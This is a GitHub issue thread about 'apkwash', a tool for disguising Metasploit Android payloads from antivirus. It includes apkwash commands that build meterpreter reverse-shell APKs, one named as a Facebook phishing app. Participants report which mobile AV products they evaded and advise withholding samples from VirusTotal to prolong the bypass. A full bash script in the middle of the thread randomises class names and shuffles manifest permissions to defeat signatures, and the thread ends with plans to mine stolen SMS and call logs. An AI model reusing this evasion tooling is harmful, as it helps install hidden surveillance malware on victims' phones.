jbreed / apkwash

Android APK Antivirus evasion for msfvenom generated payloads.
GNU General Public License v3.0

Issues with timwr apk merge script #1

Closed iamalsaher closed 7 years ago

iamalsaher commented 7 years ago

May I suggest adding support for xc0d3rz's metasploit-apk-embed-payload, so that this script becomes a one-stop shop: wash the APK and merge.

jbreed commented 7 years ago

@iamalsaher I agree, having one script to handle everything would be ideal. The weekend I put this script together I also put together https://github.com/jbreed/apkinjector for injecting into other payloads. This was without realizing @xc0d3rz has done this, or that msfvenom had an option for doing this (probably the path I will take).

Once I get more time in a couple of weeks I will refine the script if Rapid7 doesn't modify the payload output to obfuscate all the strings and filenames being flagged.

Feel free to fork the project!

Future modifications:

Examples:

apkwash -p android/meterpreter/reverse_https LHOST=\ LPORT=\ -o LegitAndroidApp.apk

Generating msfvenom payload

Pulling apart the package with APKTool

Modifying the payload to avoid AV detection

Building the package with APKTool

Signing the package

Complete: \/LegitAndroidApp.apk

apkwash -p android/meterpreter/reverse_https LHOST=\ LPORT=\ -x \.apk -o FacebookPhishingApp.apk

Generating msfvenom payload using '-x' option for injection into \.apk

Pulling apart the package with APKTool

Modifying the payload to avoid AV detection

Building the package with APKTool

Signing the package

Complete: \/FacebookPhishingApp.apk

## NOTE ## At the moment it appears msfvenom is doing a good job avoiding AV flags when using the '-x' option for injecting into an original package. With that, it isn't a big priority for handling the injection, which makes the apkinjector script useless at this time. When MSFVenom fails to stay ahead of the curve, then having the ability to manipulate parts of the payload as deemed necessary will be nice to have.

If obtaining this information in the script, then it can also handle generating a handler.rc file for spinning up the handler at a later point quickly, or even ask to start the handler.

jbreed commented 7 years ago

@timwr Do you guys plan on modifying the generated payload for string and filename obfuscation? Last I checked, the '-x' option was 0/36 on nodistribute, but for those looking for the absolute smallest payload, ideally the default payload already avoids AV.

iamalsaher commented 7 years ago

@jbreed Don't you think nodistribute lags behind? I generated a payload from Fatrat and msfvenom. Both were 0 on nodistribute, whereas on my personal device each was detected by 3 antivirus products as Meterpreter, that is Avast, AVG and Kaspersky. And even after washing the APK, it was still detected by Kaspersky and Avast as a potentially suspicious program.

And I don't know about any other antivirus that may have detected them.

Unlike a Windows application, Android apps can have ample permissions and can do absolutely anything and still not be malicious.

YARA-based rules won't be effective unless they definitely have something fixed which cannot be changed.

So I suggest obfuscating everything.

What about integrating the script with ProGuard?

So the potential steps would be:

  1. Generate payload
  2. Wash the payload
  3. ProGuard it
  4. Embed the payload in an app

What do you think?

jbreed commented 7 years ago

@iamalsaher I agree that I have seen nodistribute return no flags, but on the device I ran AVG, Kaspersky, and another to fully test. I never actually tested the -x payload on a device.

When you say "even after washing the APK, it was still detected by Kaspersky and Avast" are you referring to the output payload generated by this script? As this hasn't been tested and updated since noted in the readme, then it could have had a signature added since. Kaspersky, AVG, and Lookout all returned the output when last tested as "safe".

The main thing to take from this is looking over the script and seeing how simple the items that are being flagged are. I originally tried to find what was being flagged by using Evade, but this didn't help at all. I then found APKTool and opened the package, then manually removed/built the package until I found each file that contained an AV signature. At that point, I would add files back into the package with manipulations until I found the culprit. The funny thing, as seen in the script, most of the signatures are SIMPLE strings pointing directly to meterpreter. It would also be nice to remove some of the permissions not necessarily needed along with adding a random order they are placed into the manifest file (looping through an array of permissions).

iamalsaher commented 7 years ago

@jbreed Yes, I am referring to the output payload generated by the script. In my research, when I was using @timwr's script for joining APKs, it made a metasploit folder in the clean APK so it could quickly copy files, and the moment I installed the APK, all AVs came alive.

Your script randomizes 3 things, whereas the others are changed to static things already defined in the script.

What I suggest as an improvement to your script is: randomize everything that you have kept static, so that there is no signature that the APK has been washed.

I have seen YARA rules of AVs, they always try to find something fixed, randomizing everything can just defeat it all, and then we can safely upload the files to even Virustotal.

That's the best thing about Android app hacking. The app can still be non-malicious, so you can't guarantee anything.

jbreed commented 7 years ago

@iamalsaher Yes, I agree about randomizing everything. As this is in bash, it can be done pretty basic as done for the filenames setup as variables. I'll go ahead and add that in really quick.
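The two randomization ideas raised above (random filenames held in bash variables, and a manifest rewrite that drops unneeded permissions and shuffles the rest) as an added example. This is not apkwash's own code; it assumes an apktool-decoded AndroidManifest.xml whose opening `<manifest ...>` tag sits on a single line, as apktool emits it, and the sample manifest it builds for the demo is constructed here, not taken from a real payload.

```shell
#!/usr/bin/env bash
# Added example (not apkwash's own code): random smali-safe identifiers and a
# permission shuffle for an apktool-decoded AndroidManifest.xml.
set -u

# rand_ident LEN: random identifier, letter first, then [a-z0-9].
# Suitable for class/file names such as PayloadXXXX.smali.
rand_ident() {
  local len="${1:-10}" first rest
  first=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c 1)
  rest=$(LC_ALL=C tr -dc 'a-z0-9' </dev/urandom | head -c "$((len - 1))")
  printf '%s%s\n' "$first" "$rest"
}

# perm_names MANIFEST: sorted permission names, used to check that a
# shuffle kept the same set.
perm_names() {
  grep '<uses-permission' "$1" \
    | sed -n 's/.*android:name="\([^"]*\)".*/\1/p' | sort
}

# shuffle_permissions MANIFEST [DROP_REGEX]
# Rewrites MANIFEST in place: all <uses-permission .../> lines are removed,
# those whose line matches DROP_REGEX (optional) are discarded, and the rest
# are re-inserted in random order directly after the <manifest ...> tag.
# Assumption: the opening <manifest ...> tag is on one line (apktool output).
shuffle_permissions() {
  local manifest="$1" drop="${2:-}" perms tmp
  tmp=$(mktemp)
  # Portable shuffle: prefix each line with a random key, sort, strip the key.
  # awk's srand() seeds from the clock, so reruns within one second repeat.
  perms=$(grep '<uses-permission' "$manifest" \
    | { if [ -n "$drop" ]; then grep -Ev "$drop"; else cat; fi; } \
    | awk 'BEGIN{srand()} {printf "%f\t%s\n", rand(), $0}' \
    | sort -k1,1n | cut -f2-)
  awk -v block="$perms" '
    /<uses-permission/ { next }            # drop every old permission line
    { print }
    /<manifest[ >]/ && !done {             # re-insert the shuffled block once
      if (block != "") print block
      done = 1
    }
  ' "$manifest" >"$tmp" && mv "$tmp" "$manifest"
}

# Demo on a constructed manifest (sample input, not from a real payload).
demo_dir=$(mktemp -d)
demo_manifest="$demo_dir/AndroidManifest.xml"
cat >"$demo_manifest" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <application android:label="app"/>
</manifest>
EOF
echo "random class name: $(rand_ident 12)"
shuffle_permissions "$demo_manifest" 'RECORD_AUDIO'
cat "$demo_manifest"
rm -rf "$demo_dir"
```

`shuffle_permissions` is the piece you would call once per build, right after apktool has decoded the package and before it rebuilds; `perm_names` before and after the call confirms nothing was lost other than what `DROP_REGEX` was meant to remove.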

With the current script, I just now generated a basic payload.apk and ran the script against it for washed_payload.apk. Of course, 0/36 on nodistribute. I then put it on the phone. Lookout Mobile said it was safe even after install and launching. I then re-installed AVG (Free edition) and it also reports the app as safe. Just downloaded Kaspersky (Free) again and running it against the payload that is still on the phone to see how it responds. Not sure what is being flagged for you. Have you commented out the line for removing the payload files, then reviewed them? If you see more than 1 PayloadXXXXX.smali file, then the msfvenom generated payload you are running may be outdated. That, or I am running an outdated version of msfvenom.

iamalsaher commented 7 years ago

Try Avast; that thing always detects it as one or the other. Before washing, it of course says Metasploit PUP, and after washing it says potentially suspicious program.

jbreed commented 7 years ago

@iamalsaher

The payload I just generated:

- 0 on nodistribute

All of the following were downloaded from Google Play and updated before running scans.

- Verified for AVG Mobile Free
- Verified for Kaspersky Mobile Free
- Verified for Avast Free
- Verified for Lookout Mobile

Something doesn't sound right. I'll update everything and see if anything potentially changed.

iamalsaher commented 7 years ago

I guess this is good enough. If we need to do a bit better, we can just randomize the order of permissions. Otherwise this is fine, I guess. Let's improve apkinjector.

We can close this, I guess.

jbreed commented 7 years ago

After updating and launching the app, I did get Avast to give me a warning about a potentially unwanted program. Will need to see if anything was added, or if it detected a behavior that was deemed potentially bad (too many permissions, etc.). I'm sure there are permissions that aren't necessary for every occasion, so lines can be commented out as deemed necessary. Ideally, they are placed into an array and inserted into the manifest file in a random order.

iamalsaher commented 7 years ago

What about other AVs?

Would you feel free uploading it to VirusTotal?

jbreed commented 7 years ago

Uploading anything to VirusTotal is asking AV companies to dig deeper into it specifically. You can, but the lifetime of the bypass will shrink.

On that note, my whole goal of even posting this was because I realized how sadly Android AV companies are performing and how silly their signatures are. If you literally do these basic obfuscation techniques you avoid ALMOST (now that Avast may flag) all AVs. Avast still let me install it, but popped up at a later point.

On another note, I think my next project (if not something for the BashBunny) will be to take SMS/Call logs from Meterpreter output, import them into a SQL Database, then make a pretty web interface for parsing over it easily. Probably utilize bootstrap, add checkboxes and filters for refined searches, etc. As it currently sits, anyone who cares to look over the information has to probably spend a good amount of time reviewing it.

iamalsaher commented 7 years ago

What I think about this is, aren't there people already scouring the web, uploading suspicious stuff to VirusTotal?

The reason signatures are silly is because you have no definitive thing to flag it as malware. Android non-malicious apps come in all types of permissions, so AVs need to improve their heuristic analysis. Since it is behavior analysis, you can't just claim it's malicious.

One of the many reasons I love Android.

In my free time, I guess I will make a few malicious apps from the original ones and compare for common strings, which might further help us in evading AVs.

iamalsaher commented 7 years ago

@jbreed Is it possible to talk somewhere private, Twitter or FB? I need some suggestions from you.